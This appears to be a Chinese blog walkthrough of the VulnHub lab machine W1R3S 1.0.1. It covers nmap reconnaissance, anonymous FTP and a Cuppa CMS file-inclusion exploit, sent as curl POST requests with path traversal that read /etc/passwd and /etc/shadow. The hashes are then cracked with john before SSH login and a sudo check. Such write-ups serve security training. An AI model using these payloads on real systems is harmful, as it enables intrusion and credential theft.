首页 > 其他分享 >W1R3S 1.0.1

W1R3S 1.0.1

时间:2024-11-01 11:01:08浏览次数:1  
标签:1.14 1.0 .. ## 端口 192.168 -- W1R3S

# 靶机下载 vulnhub -> W1R3S 1.0.1 # nmap扫描收集信息 ## 主机发现 **-sn**参数,仅探活主机 `nmap -sn 192.168.1.0/24` 通过对比新增主机,可以确定192.168.1.14是靶机 ## 扫描开放端口 `nmap -sT --min-rate 10000 -p- 192.168.1.14 -oA ./port` **-sT**参数是通过完整的tcp连接过程来确定端口开放状态,结果更准确也更隐蔽。**--min-rate**参数指定扫描速率,取准确度跟速度的平衡值。**-p-**参数指定扫描所有端口。**-oA**参数将结果输出成三种格式的文件,方便后面查看。 ## 扫描详细信息 `nmap -sT -sC -sV -O 192.168.1.14 -p21,22,80,3306 -oA ./detail` ## 扫udp端口开放情况 `nmap -sU --top-ports 20 192.168.1.14` ## 脚本扫描 `nmap --script=vuln -p21,22,80,3306 192.168.1.14 -oA ./vuln` ## 确定任务优先级 21端口跑的是ftp服务而且可以匿名登录,可能有信息泄露。22端口跑的ssh,爆破进去的希望不大,优先级往后排。80端口跑的http,比较重要。3306端口跑的mysql,可以尝试去登录一下。优先级21,3306,80,22. ## ftp渗透 ftp 192.168.1.14 利用anonymous登录 利用get把文件都下载下来,注意进去ftp后先执行binary命令可以保证下载下来的文件不会损坏

这个泄露了员工姓名和对应职位,其他的文件都没看出什么信息

## 尝试登录mysql

不允许远程登录(这里我网络环境变了,靶机ip也变了)

## 渗透80端口

 前面得到wordpress页面,拼接访问

无论点击哪个按钮都会跳转到localhost

扫目录,看看有没有新的突破口

`dirsearch -u http://192.168.128.58 --json-report=result`

得到很多路径,拼接访问。有个cuppa cms的安装页面

点击next往下安装,安装成功但是创建用户失败

 查有没有历史漏洞

`searchsploit cuppa cms`

把exp复制到当前目录

`searchsploit -m 25971.txt`

 里面列出访问路径,漏洞出现行,文件包含漏洞,exp示范。有本地任意文件包含,能实现任意文件读取

尝试拼接访问,404

 往administrator目录后拼接,404

删掉/cuppa后往administrator拼接,访问成功但是没内容返回

到网上找cms源码看看

 要post方式传参

`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/passwd"`

`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/shadow"`

将有哈希的保存到一个文件,然后用john爆破,`john shadowtest --wordlist /usr/share/wordlists/rockyou.txt`。等待运行完毕使用`john --show shadow文件名`查看

## ssh连接

得到密码后通过ssh连接靶机,`ssh username@ip`

查看当前权限,可以看到用sudo命令权限

`id`

查看可以sudo执行的命令,3个ALL相当于root权限

`sudo -l`

 

标签:1.14,1.0,..,##,端口,192.168,--,W1R3S
From: https://www.cnblogs.com/dg05/p/18516843

相关文章

  • 地平线 3D 目标检测 bev_sparse 参考算法-V1.0
    该示例为参考算法,仅作为在征程6上模型部署的设计参考,非量产算法01简介在自动驾驶视觉感知系统中,为了获得环绕车辆范围的感知结果,通常需要融合多摄像头的感知结果。目前更加主流的感知架构则是选择在特征层面进行多摄像头融合。其中比较有代表性的路线就是这两年很火的BE......
  • 《DNK210使用指南 -CanMV版 V1.0》第三十四章 image图像滤波实验
    第三十四章image图像滤波实验1)实验平台:正点原子DNK210开发板2)章节摘自【正点原子】DNK210使用指南-CanMV版V1.03)购买链接:https://detail.tmall.com/item.htm?&id=7828013987504)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210/ATK-DNK210.html5)......
  • activiti 7.1.0.M6会签退单后再次审批的Bug解决
       如图,退单成功后再次申请无法创建多任务。需要通过任务的时候删除流程变量,代码如下:/***multiinstance*/publicstaticfinalList<String>MULTIINSTANCEKEYS=Arrays.asList("manageCreditReviceCommitteeApproval");/***multivariables*/publicstaticfin......
  • 游戏系统代码1.0
    usingSystem.Collections;usingSystem.Collections.Generic;usingUnityEngine;publicclassInventoryPanel:MonoBehaviour{//StartiscalledbeforethefirstframeupdatevoidStart(){}//Updateiscalledonceperfram......
  • C++/C电子宠物1.0
    使用的是一个在线编程的网站,是linux环境https://www.onlinegdb.com/#include<iostream>#include<stdlib.h>#include<time.h>#include<unistd.h>#include<pthread.h>#include<string>usingnamespacestd;intwindow();intea......
  • Post apocalyptic survival character v1.0.1 末日生存人物男
    链接https://pan.baidu.com/s/11zQyVW9V55B_615sc-QIqQ?pwd=hkqr......
  • 《DNK210使用指南 -CanMV版 V1.0》第三十三章 image元素绘制实验
    第三十三章image元素绘制实验1)实验平台:正点原子DNK210开发板2)章节摘自【正点原子】DNK210使用指南-CanMV版V1.03)购买链接:https://detail.tmall.com/item.htm?&id=7828013987504)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210/ATK-DNK210.html5)......
  • 太极安全监控系统1.0(Python)
    一、项目介绍和功能介绍1.项目介绍安全监控系统是一个综合性的安全监控和防护工具,旨在帮助系统管理员检测和应对网络中的可疑活动。该系统集成了多种安全技术和工具,包括日志分析、网络流量监控、机器学习模型、动态防火墙规则配置、蜜罐部署、沙箱管理和自动反击功能。通......
  • HarryPotter: Aragog (1.0.2)靶场渗透
    靶场:HarryPotter:Aragog(1.0.2)HarryPotter:Aragog(1.0.2)~VulnHubhttps://www.vulnhub.com/entry/harrypotter-aragog-102,688/攻击机:kali-linux-2024第一部分:信息收集1,将两台虚拟机网络连接都改为NAT模式,并查看靶机的MAC地址2,攻击机上做主机扫描发现靶机......
  • 电脑端 进销存库存管理系统 华讯库存管理系统 v1.0
    这款免费网络版进销存库存管理系统,不仅支持无限用户同时使用,且功能不受任何限制。它界面简洁、操作简单,非常适合小规模企业,完全可以取代传统的Excel表格处理进销存管理及出入库业务。系统分为五个主要板块:入库管理、出库管理、库存报表、资料管理、系统设置。各板块功能清晰,使......